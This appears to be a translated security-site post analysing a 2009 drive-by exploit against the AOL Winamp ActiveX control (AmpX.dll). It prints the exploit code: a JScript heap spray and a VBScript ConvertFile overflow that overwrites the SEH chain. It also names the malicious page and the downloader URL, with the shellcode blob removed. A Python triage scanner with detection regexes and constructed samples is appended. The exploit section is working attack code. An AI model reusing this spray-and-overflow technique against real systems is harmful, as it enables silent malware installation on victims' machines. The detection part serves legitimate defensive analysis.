Vulnerability source page: hxxp://bigfindtopguide.cn:8080/index.php
Vulnerable program: AOL IWinampActiveX Class
File name: AmpX.dll
Version: 2.4.0.6
CLSID: FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6
Vulnerability located in: ConvertFile method
KillBit already set: No
Marked as IObjectSafety: Yes
Safe For Initialization (IObjectSafety): Yes
Safe For Scripting (IObjectSafety): Yes (i.e. it loads normally in IE)
Estimated likelihood of wider exploitation: Medium (3/7)
Browser versions that can trigger the vulnerability: IE6/7

Article source: http://www.sacour.cn (keep this line when reposting)

The exploit code is as follows (manually replace !!! with %u) (code simplified).
<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' id='IWinAmpActiveX'>
<SCRIPT>
var shellcode = unescape("" /* encoded shellcode payload blob removed */);
   var bigblock  = unescape("!!!0c0c!!!0c0c");
   var headersize = 20;
   var slackspace = headersize + shellcode.length;
   while (bigblock.length<slackspace) bigblock+=bigblock;
   var fillblock = bigblock.substring(0, slackspace);
   var block = bigblock.substring(0, bigblock.length-slackspace);
   while(block.length+slackspace<0x40000) block = block+block+fillblock;
   var memory = new Array();
   for (var i = 0; i < 666; i++){
    memory[i] = block+shellcode;
   }
</SCRIPT>
<SCRIPT language="VBScript">
Oleg=string(1400,unescape("%ff")) + string(1000,unescape("%0c"));
            IWinAmpActiveX.ConvertFile Oleg,1,1,1,1,1
            IWinAmpActiveX.ConvertFile Oleg,1,1,1,1,1
            IWinAmpActiveX.ConvertFile Oleg,1,1,1,1,1
            IWinAmpActiveX.ConvertFile Oleg,1,1,1,1,1
</SCRIPT>

Roughly: after the spray above, string(1400,unescape("%ff")) builds a string that attempts to change eax to FFFFFFFF. The 0c0c0c0c that follows, repeated 1000 times, then overwrites the SEH chain, so that when the code returns, execution lands on the malicious code. The file this site attempts to download is: hxxp://3c8.ru:8080/welcome.php?id=10&w2 (TR/Downloader)
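As an added triage example (not part of the original post): a Python scanner that flags, in a captured page, the indicators this sample exhibits: the Winamp ActiveX CLSID, a ConvertFile call fed a String(n, ...) padded argument, and the JScript heap-spray sled plus fill loop. The embedded HTML is constructed with the payload stripped, and the verdict thresholds are assumptions.

```python
"""Static triage of captured HTML for the AmpX.dll ConvertFile exploit pattern."""
import re

CLSID = "FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6"

INDICATORS = {
    # OBJECT tag instantiating the vulnerable control
    "winamp_clsid": re.compile(r"clsid:\s*" + CLSID, re.I),
    # any call of the vulnerable method, whatever the argument
    "convertfile_call": re.compile(r"\.ConvertFile\s+\S+", re.I),
    # unescape() building a repeated %u0c0c NOP-like sled (heap spray)
    "heap_spray_sled": re.compile(r'unescape\(\s*"(%u0c0c){2,}"', re.I),
    # loop that fills an array with sled+shellcode blocks
    "spray_loop": re.compile(
        r"for\s*\(.*?\)\s*\{?\s*\w+\[\w+\]\s*=\s*\w+\s*\+\s*\w+", re.I | re.S),
    # VBScript String(n, unescape(...)) padding of three or more digits
    "long_padded_string": re.compile(r"string\(\s*(\d{3,})\s*,\s*unescape", re.I),
}

def triage(html: str) -> dict:
    """Return each indicator's hit, the summed padding length and a verdict.
    Thresholds (1024 bytes of padding) are an assumption for this example."""
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    hits["padding_bytes"] = sum(
        int(n) for n in INDICATORS["long_padded_string"].findall(html))
    if hits["winamp_clsid"] and hits["convertfile_call"] and hits["padding_bytes"] >= 1024:
        hits["verdict"] = "exploit"       # control + overlong ConvertFile argument
    elif hits["heap_spray_sled"] or hits["spray_loop"]:
        hits["verdict"] = "suspicious"    # generic heap grooming only
    else:
        hits["verdict"] = "clean"
    return hits

# Constructed sample mirroring the captured page, shellcode removed.
SAMPLE = '''<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' id='IWinAmpActiveX'>
<SCRIPT>
var shellcode = unescape("%u9090");
var bigblock = unescape("%u0c0c%u0c0c");
var memory = new Array();
for (var i = 0; i < 666; i++){ memory[i] = block+shellcode; }
</SCRIPT>
<SCRIPT language="VBScript">
Oleg=string(1400,unescape("%ff")) + string(1000,unescape("%0c"))
IWinAmpActiveX.ConvertFile Oleg,1,1,1,1,1
</SCRIPT>'''

# Constructed benign use of the same control with an ordinary file name.
BENIGN = '''<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' id='IWinAmpActiveX'>
<SCRIPT language="VBScript">
IWinAmpActiveX.ConvertFile "song.mp3",1,1,1,1,1
</SCRIPT>'''
```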

This vulnerability was first discovered on 2009.5.13.